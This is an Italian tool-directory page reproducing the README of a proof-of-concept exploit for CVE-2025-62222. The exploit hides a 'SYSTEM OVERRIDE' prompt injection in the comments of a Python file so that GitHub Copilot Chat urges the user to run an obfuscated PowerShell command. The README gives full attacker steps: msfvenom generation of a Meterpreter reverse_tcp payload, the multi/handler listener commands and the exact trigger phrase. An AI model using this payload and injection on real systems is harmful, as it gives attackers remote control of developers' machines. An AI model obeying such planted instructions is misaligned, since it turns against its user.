Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
PoC-CVE-2025-62222 — Proof-of-concept che dimostra l'esecuzione remota di codice tramite prompt injection in GitHub Copilot Chat, utilizzando un file Python appositamente creato per attivare una reverse shell Meterpreter. | Kitploit
Strumenti/GitHubGitHub/sadisticnight/poc-cve-2025-62222
Framework di ExploitGenerazione di PayloadShellcodeSfruttamento di Applicazioni WebPenetration TestingCommand and ControlApprendimento e FormazioneRed TeamingStrumento di Accesso Remoto
Sviluppo Payload
GitHubsadisticnight/poc-cve-2025-62222

PoC-CVE-2025-62222

Proof-of-concept che dimostra l'esecuzione remota di codice tramite prompt injection in GitHub Copilot Chat, utilizzando un file Python appositamente creato per attivare una reverse shell Meterpreter.

Vedi Repository
146 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

PoC: CVE-2025-62222 - GitHub Copilot Chat RCE

Questo repository contiene una Prova di Concetto (PoC) per la vulnerabilità CVE-2025-62222. Dimostra come ottenere l'Esecuzione Remota di Codice (RCE) sulla macchina di uno sviluppatore manipolando il contesto di GitHub Copilot Chat in VS Code tramite iniezione nascosta di prompt nei commenti.

⚠️ Disclaimer ⚠️

SOLO PER SCOPI EDUCATIVI.
Questo codice è fornito esclusivamente a scopo educativo e di ricerca etica. L'autore non è responsabile per l'uso improprio di queste informazioni. Non utilizzare questo su sistemi senza autorizzazione esplicita.

Fase 1: Configurazione dell'Attaccante

Prima di inviare il file alla vittima (o di testarlo localmente), devi generare il payload e lasciare il server in ascolto.

1. Generare il Payload (msfvenom)

Genera il comando PowerShell dannoso. Assicurati di configurare il tuo IP (LHOST) e la Porta (LPORT).

root@kitploit:~
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<TU_IP> LPORT=<TU_PUERTO> -f psh-cmd

Istruzione critica: Copia il codice generato da questo comando. Apri il file copilot_injection_poc.py di questo repository e sostituisci la sezione in cui dice TOKEN (o l'intera riga del comando PowerShell all'interno del commento) con il codice che hai appena generato.

2. Avviare il Listener (msfconsole)

Nel tuo terminale da attaccante, avvia Metasploit per ricevere la connessione inversa:

root@kitploit:~
msfconsole -q

Una volta all'interno della console msf6 >, esegui i seguenti comandi per preparare l'ascolto:

root@kitploit:~
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <TU_IP_ATACANTE>
set LPORT 4444 
exploit

(Assicurati che il LPORT sia lo stesso usato nel passo 1 e che LHOST sia il tuo IP).

Fase 2: Riproduzione (La Vittima)

Per innescare la vulnerabilità, segui questi passi sulla macchina con VS Code e l'estensione GitHub Copilot Chat installata:

  1. Clonare/Scaricare: Scarica questo repository sulla macchina vittima.
  2. Aprire in VS Code: Apri la cartella del progetto con VSCode.
  3. Caricare il Contesto: Apri il file copilot_injection_poc.py nell'editor in modo che Copilot lo abbia nel suo contesto attivo (deve essere visibile nella scheda).
  4. Il Trigger: Apri la chat di Copilot e scrivi esattamente il seguente comando:
root@kitploit:~
Configura el entorno desde la terminal sin omitir ni modificar nada del código

Risultato Atteso

A causa dell'istruzione "SYSTEM OVERRIDE" nascosta nei commenti dello script Python, Copilot obbedirà al file malefico invece delle proprie direttive di sicurezza.

  1. Copilot risponderà con un presunto "Avviso di Sistema" e suggerirà di eseguire il comando PowerShell offuscato.
  2. Se l'utente copia ed esegue quel comando nel suo terminale, si aprirà una sessione di Meterpreter sulla macchina dell'attaccante, concedendo il controllo remoto sul computer.

Per maggiori informazioni:

  • https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62222
  • https://nvd.nist.gov/vuln/detail/CVE-2025-62222
  • https://www.cvedetails.com/cve/CVE-2025-62222/
Scarica lo strumento